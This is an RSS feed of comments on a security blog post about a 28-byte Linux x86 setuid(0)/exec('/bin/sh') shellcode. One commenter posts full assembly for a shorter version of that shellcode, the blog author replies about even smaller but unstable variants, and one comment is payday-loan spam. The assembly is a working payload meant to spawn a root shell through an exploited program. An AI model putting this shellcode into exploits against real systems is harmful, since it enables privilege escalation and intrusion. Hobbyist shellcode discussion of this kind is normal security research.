<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
		>
<channel>
	<title>Comments on: Smallest GNU/Linux x86 setuid(0) &amp; exec(&#8220;/bin/sh&#8221;,0,0) Stable shellcode &#8211; 28 bytes</title>
	<atom:link href="http://opensec.es/2008/11/26/gnulinux-setuid0-execbinsh00-stable/feed/" rel="self" type="application/rss+xml" />
	<link>http://opensec.es/2008/11/26/gnulinux-setuid0-execbinsh00-stable/</link>
	<description>Development &#38; Security Research</description>
	<lastBuildDate>Thu, 01 Sep 2011 23:30:12 +0000</lastBuildDate>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3</generator>
	<item>
		<title>By: sch3m4</title>
		<link>http://opensec.es/2008/11/26/gnulinux-setuid0-execbinsh00-stable/comment-page-1/#comment-10417</link>
		<dc:creator>sch3m4</dc:creator>
		<pubDate>Sun, 25 Apr 2010 19:22:04 +0000</pubDate>
		<guid isPermaLink="false">http://opensec.es/?p=134#comment-10417</guid>
		<description>I&#039;m sorry, I&#039;ve been offline for a long time.

About your comment, I haven&#039;t tested it however if it always works taking care about registry contents (garbage), could be valid.

On the other hand, it&#039;s possible to do it smaller, I remember versions made by vlan7 or me about 24/25 bytes, but unstable.

Good work ;)</description>
		<content:encoded><![CDATA[<p>I&#8217;m sorry, I&#8217;ve been offline for a long time.</p>
<p>About your comment, I haven&#8217;t tested it however if it always works taking care about registry contents (garbage), could be valid.</p>
<p>On the other hand, it&#8217;s possible to do it smaller, I remember versions made by vlan7 or me about 24/25 bytes, but unstable.</p>
<p>Good work ;)</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Tom Madsen</title>
		<link>http://opensec.es/2008/11/26/gnulinux-setuid0-execbinsh00-stable/comment-page-1/#comment-10078</link>
		<dc:creator>Tom Madsen</dc:creator>
		<pubDate>Mon, 08 Mar 2010 00:23:01 +0000</pubDate>
		<guid isPermaLink="false">http://opensec.es/?p=134#comment-10078</guid>
		<description>Wouldn&#039;t:

bits 32
global _start
section .text
_start:
xor ebx,ebx
push byte 23
runit:
pop  eax
cdq
int 0x80
xor ecx,ecx
push ecx
push 0x68732f6e
push 0x69622f2f
mov ebx,esp
push byte 11
jmp short runit


be one byte shorter?</description>
		<content:encoded><![CDATA[<p>Wouldn&#8217;t:</p>
<p>bits 32<br />
global _start<br />
section .text<br />
_start:<br />
xor ebx,ebx<br />
push byte 23<br />
runit:<br />
pop  eax<br />
cdq<br />
int 0&#215;80<br />
xor ecx,ecx<br />
push ecx<br />
push 0x68732f6e<br />
push 0x69622f2f<br />
mov ebx,esp<br />
push byte 11<br />
jmp short runit</p>
<p>be one byte shorter?</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: payday loans</title>
		<link>http://opensec.es/2008/11/26/gnulinux-setuid0-execbinsh00-stable/comment-page-1/#comment-9863</link>
		<dc:creator>payday loans</dc:creator>
		<pubDate>Sun, 14 Feb 2010 03:04:27 +0000</pubDate>
		<guid isPermaLink="false">http://opensec.es/?p=134#comment-9863</guid>
		<description>I am very impressed with the article I have just read. I wish the writer of opensec.es can continue to provide so much worthwhile information and unforgettable experience to opensec.es readers. There is not much to state except the following universal truth: A person who says something is impossible is usually interrupted by the person doing it. I will be back.</description>
		<content:encoded><![CDATA[<p>I am very impressed with the article I have just read. I wish the writer of opensec.es can continue to provide so much worthwhile information and unforgettable experience to opensec.es readers. There is not much to state except the following universal truth: A person who says something is impossible is usually interrupted by the person doing it. I will be back.</p>
]]></content:encoded>
	</item>
</channel>
</rss>

